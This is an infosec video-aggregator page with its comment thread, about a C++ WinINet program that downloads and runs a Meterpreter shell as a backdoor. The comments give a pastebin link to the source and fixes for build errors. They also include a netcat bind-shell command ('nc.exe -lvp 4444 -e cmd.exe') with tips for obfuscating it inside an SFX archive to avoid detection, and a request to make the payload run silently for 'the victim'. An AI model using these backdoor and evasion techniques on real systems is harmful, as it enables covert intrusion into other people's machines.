Description: in this video i use c++ and Wininet api for download and execute Meterpreter shell
i will public sourcecode in pastebin more later
sorry bad english
Tags: Metasploit , C++ , backdoor , msfpayload , wininet ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.
Hey armitate this video is best for thank you very much but im waiting for source code in pastebin i hope posted thnx again
Thanks! Nice video like others,waiting for code and next video =).
how o can make videos in HD? mmy vids have bad quality :S and i use camtasia studio
the sources in one momen plis wait.
http://pastebin.com/v63xzAYc
Compiler: Default compiler
Building Makefile: "C:\Documents and Settings\EnCoder\httpencode\Makefile.win"
Executing make...
make.exe -f "C:\Documents and Settings\EnCoder\httpencode\Makefile.win" all
g++.exe httpshell.o -o "httpshell.exe" -L"C:/Dev-Cpp/lib" -mwindows
httpshell.o(.text+0x152):httpshell.cpp: undefined reference to `InternetOpenA@20'
httpshell.o(.text+0x1b1):httpshell.cpp: undefined reference to `InternetOpenUrlA@24'
httpshell.o(.text+0x1f5):httpshell.cpp: undefined reference to `InternetCloseHandle@4'
httpshell.o(.text+0x22d):httpshell.cpp: undefined reference to `InternetReadFile@16'
httpshell.o(.text+0x281):httpshell.cpp: undefined reference to `InternetCloseHandle@4'
httpshell.o(.text+0x28f):httpshell.cpp: undefined reference to `InternetCloseHandle@4'
collect2: ld returned 1 exit status
make.exe: *** [httpshell.exe] Error 1
Execution terminated
any idea?
solved but not working for me....
fixed, working....
is a references error,
open project
right click on project
go to tap parameters
in the linker textarea put -lwininet
compile.
@Armitage1989 yes this is the first problem, the second is project type: solved with win32 console. nice job armitage1989
yes is a win32 console, c++ project
thnk for views and comment
@ArmitageHacker
About the Camtasia and the HD, I use it too for my videos, you can choose the Dimensions for HD when you import the screen record in the Camtasia Studio, choose it in your original size or choose your own dimensions.
Edit your video as you want and then File> Produce and Share> Web and you should be good to go
Hope that I've helped … :)
Thank you for the video Armitage. I never knew about this method. I can't wait to try it out. Thanks for the pastebin too, that makes it easier to replicate. There's alot bad videos out there but yours are always very informative.
Oh, and you have to be a premium user for more than one hd video per week
He isn't the real Armitage guy, just in case you didn't notice...
@ArmitageHacker is other user
I am armitage1989 another user in this site.
@PoisonReverse
sometimes the ideas are and not put into practice, to make things right and succeed in this in pentest to do what we think of, that's what I apply is why I use almost the methods are almost undetectable if anyone has an idea or something like that it is best to try to learn a lot there. for example if one would think we could use netcat to do? simple netcat obfuscate the code and compress it or attach it to a sfx and advanced put in the options after extraction execute:
nc.exe -lvp 4444 -e cmd.exe
and get a shell
Como es que solo tienes 3 vos en el foro ???
De Java y Python no tienes nada
Archivos
o febrero 2012 (1)
o octubre 2011 (2)
@Armitage1989 that's what I mean (consider whatever I wrote as @ArmitageHacker that is for you)
Oh sorry, my mistake, now I see. But again, the comments are for you ;p
@AntyPoliCe
no te entiendo men,si lo que me estas diciendo es que porque solo tengo 2 post en la web, es que no tengo tiempo para postear en las demas categorias, pero tengo muchas cosas de java,pyhton solo que no tengo tiempo
A que mas iba a preguntarte, de donde fue que aprendiste tanto, es decir te enseño alguien o has leido por internet.
Porque yo leo por internet pero nada las cosas buenas no te las dicen jajaja
la practica bro, y muchos papers cuando no te comparten informacion simplemete busca otras fuentes nunca hay que quedar a mitad de camino y listo
Muy buen video Armitage1989 , lo eh practicado y pues eh tenido un pequeño erro en
cuando ejecuto aqui te doy una imagen de cual es el error ya que cuando se cierra la pantalla cmd ,se cierra la session ,
solo 2 preguntas amigo :
1- Porque este error eh puesto "-lwininet" en parametro y en tipo: win32 consola aquí esta la imagen :
https://fbcdn-sphotos-a-a.akamaihd.net/hphotos-ak-snc6/230633_590323897661219_1726349099_n.jpg
2- Que puedo modificar en el código para que cuando la victima ejecute pues todo sea silencioso y al cerrar el csm no cierre la sesión.
Amigo , eres un crack y gracias de antemano ya llevo muchas semanas en este problema y no puedo comprender el error ya que lo intente ejecutar en windows 7 , xp sp3 etc .
( comento que cuando lo ejecute ,por tcpview vi que se abrió una session pero como ahí aparece en la imagen se colgo y aparece eso , espero me ayudes ) saludos estaré esperando tu respuesta.
brother pueda que cometas un error comun al momento de crear la shellcode, cuando sale el No enviar es porque minimos estas pisando bytes te recomiendo que depures paso a paso la shellcode prueba usando shellcode-test y la depuras con el el ollydbg aveces este error es comun debido a que si se ejecuta. pero el primer stage de la shellcode osea cuando se abre la conexion socket normal y al intentar ejecutar el resto puede que aya algun byte malo..en realidad pueden ser muchos factores pero te rrecomiendo que depures la shellcode...
.
sigue el tuto... man
gracias por comentar